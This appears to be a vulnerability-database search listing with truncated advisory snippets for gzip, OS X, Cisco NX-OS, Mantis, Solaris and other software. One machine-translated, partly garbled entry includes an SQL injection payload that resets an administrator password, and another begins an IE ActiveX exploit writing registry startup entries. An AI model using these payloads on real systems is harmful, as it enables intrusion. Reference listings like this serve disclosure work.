772 matches found
CVE-2004-0603
gzexe in gzip 1.3.3 and earlier will execute an argument when the creation of a temp file fails instead of exiting the program, which could allow remote attackers or local users to execute arbitrary commands, a different vulnerability than CVE-1999-1332...
Apple OS X 'blued' buffer overflow vulnerability
Apple OS X is a BSD-based operating system distributed by Apple. A buffer overflow vulnerability exists in 'blued' when Apple OS X handles XPC messages, which allows a local user to exploit the vulnerability to execute arbitrary code...
Cisco NX-OS Python Scripting Engine Root Access Vulnerability
Cisco NX-OS software is a data center-class operating system that embodies modular design, sustainability, and maintainability. Cisco NX-OS has a security vulnerability that allows a user with locally executable Python scripts to elevate privileges on the Python subsystem and gain root privileges...
Oracle Solaris Third-Party Patch Update : texinfo (cve_2006_4810_buffer_overflow)
The remote Solaris system is missing necessary patches to address security updates: - Buffer overflow in the readline function in util/texindex.c, as used by the (1) texi2dvi and (2) texindex commands, in texinfo 4.8 and earlier allows local users to execute arbitrary code via a crafted Texinfo file...
Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.PHP File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/15212/info Mantis is prone to a remote and local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute...
RobTex Viking Server 1.0.6 Build 355 Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1614/info A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied. / Robotex Viking Server...
Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit
No description provided by source. Sun Microsystems Solaris sysinfo Kernel Memory Disclosure exploit: Local exploitation of an integer overflow vulnerability in Sun Microsystems Inc. Solaris allows attackers to read kernel memor...
HawtJNI: predictable temporary file name leading to local arbitrary code execution
The HawtJNI Library class wrote native libraries to a predictable file name in /tmp when the native libraries were bundled in a JAR file, and no custom library path was specified. A local attacker could overwrite these native libraries with malicious versions during the window between when HawtJN...
Puppet Enterprise < 3.0.1 Multiple Vulnerabilities
According to its self-reported version number, the Puppet Enterprise install on the remote host is a version prior to 3.0.1. As a result, it reportedly has multiple vulnerabilities: - An error exists related to the included Ruby SSL client that could allow man-in-the-middle attacks. CVE-2013-4073...
CVE-2013-4256
Multiple stack-based and heap-based buffer overflows in Network Audio System (NAS) 1.9.3 allow local users to cause a denial of service (crash) or possibly execute arbitrary code via the (1) display command argument to the ProcessCommandLine function in server/os/utils.c; (2) ResetHosts function in...
SimpleTransfer 2.2.1 - Command Injection Vulnerabilities
Document Title: SimpleTransfer 2.2.1 - Command Injection Vulnerabilities; References (Source): http://www.vulnerability-lab.com/getcontent.php?id=937; Release Date: 2013-05-02; Vulnerability Laboratory ID (VL-ID): 93...
Pitrinec MacroToolworks 7.5 Buffer Overflow
Title: Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability; Date: 2012-03-08; References: http://www.vulnerability-lab.com/getcontent.php?id=466; VL-ID: 466; Introduction: Macro Toolworks is powerful all-in-one Windows automation macro software. It...
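Apple Mac OS X Local Privilege Escalation Vulnerability (CVE-2011-3463)
Bugtraq ID: 51816 CVE ID: CVE-2011-3463 Apple Mac OS X is the operating system released by Apple. There is a flaw in how WebDAV Sharing handles user authentication: a user with a valid account on the server, or in one of its bound directories, can execute arbitrary code with system privileges. This issue does not affect versions prior to OS X Lion. Apple Mac Os X Server 10.7.2 Apple Mac Os X Server 10.7.1 Apple Mac Os X Server 10.7 Vendor solution: Apple Mac Os X Server 10.7.3 has fixed this vulnerability; users are advised to download and use it:...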
ghostscript: gs_init.ps searched in current directory despite -P-
Ghostscript 8.71 and earlier reads initialization files from the current working directory, which allows local users to execute arbitrary PostScript commands via a Trojan horse file, related to improper support for the -P- option to the gs program, as demonstrated using gsinit.ps, a different...
Mssql rebound injection record collection-vulnerability warning-the black bar safety net
One night a study of SA injection point when Hua B to I came some information Made up to do a recording. Skull more and more bad with the Hey Change the administrator password ‘;update user set pwd=’1519804e89226cf9893a05d9e3fc8bbb’ where LogonName=’hmingming’;– ----------------------------- Colu...
CVE-2010-4096
share/ma/keysforuser in Monkeysphere 0.31 and 0.32 allows local users to execute arbitrary code via unknown manipulations related to the "monkeysphere-authentication keys-for-user" command...
McAfee LinuxShield remote/local Code Execution Vulnerability
Exploit for unknown platform in category remote exploits. McAfee LinuxShield remote/local Code Execution Vulnerability. Title: McAfee LinuxShield remote/local code execution...
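IE ActiveX Local Code Execution Vulnerability
clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B This code does not execute immediately when run; it writes a startup entry to the registry, and the result can be seen after a reboot! IE6,7,8 For now, use another browser that is not based on the IE engine. html object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' /object script language='vbscript' targetFile = "c:\WINDOWS\system32\wshom.ocx" prototype = "Sub RegWrite ByVa...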
HP-UX Update for envd HPSBUX02073
Check for the Version of envd OpenVAS Vulnerability Test HP-UX Update for envd HPSBUX02073 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the terms of the G...